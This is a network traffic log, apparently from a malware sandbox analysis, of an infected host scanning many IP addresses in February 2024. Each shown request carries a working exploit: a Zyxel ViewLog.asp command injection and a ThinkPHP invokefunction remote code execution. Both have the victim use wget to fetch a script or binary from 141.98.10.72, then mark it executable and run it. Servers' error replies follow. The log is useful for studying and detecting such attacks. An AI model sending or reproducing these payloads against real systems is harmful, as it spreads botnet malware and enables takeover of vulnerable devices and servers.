                                                        Feb 14, 2024 09:36:13.409363031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1111192.168.2.144226495.183.101.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.437773943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:33.676078081 CET324INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.0
                                                        Date: Wed, 14 Feb 2024 08:35:33 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1112192.168.2.143779231.44.130.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.445286989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1113192.168.2.145779094.121.191.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.447422028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1114192.168.2.143397031.200.109.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.447726965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1115192.168.2.145125494.123.53.818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.447813988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1116192.168.2.143579494.121.40.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449304104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1117192.168.2.145111294.120.96.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449429989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1118192.168.2.145668094.123.28.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449461937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1119192.168.2.143616094.120.212.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449496031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1120192.168.2.144193431.200.2.178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449640036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1121192.168.2.143804494.121.109.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.449691057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1122192.168.2.1460046112.125.121.22380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.042517900 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.389895916 CET318INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Via: HTTP/1.1 SLB.18
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1123192.168.2.143677895.101.67.20380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.251431942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.458905935 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 34 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 34 26 23 34 36 3b 65 36 61 66 39 39 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e4e6655f&#46;1707899734&#46;e6af998</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1124192.168.2.144295895.129.202.21880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.258258104 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.472490072 CET199INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1125192.168.2.145410095.217.77.17480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.262535095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.481457949 CET406INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Server: Apache/2
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1126192.168.2.144914095.217.131.3180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.268959045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.494390011 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1127192.168.2.144834095.216.14.10980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.270003080 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.496275902 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1128192.168.2.144758295.216.53.7080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.271410942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.498497963 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.2
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1129192.168.2.144069895.211.149.11380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.461278915 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.670505047 CET295INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1130192.168.2.144080895.111.232.13180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.468688011 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.679528952 CET450INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.33
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1131192.168.2.145138495.100.117.1980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.471286058 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
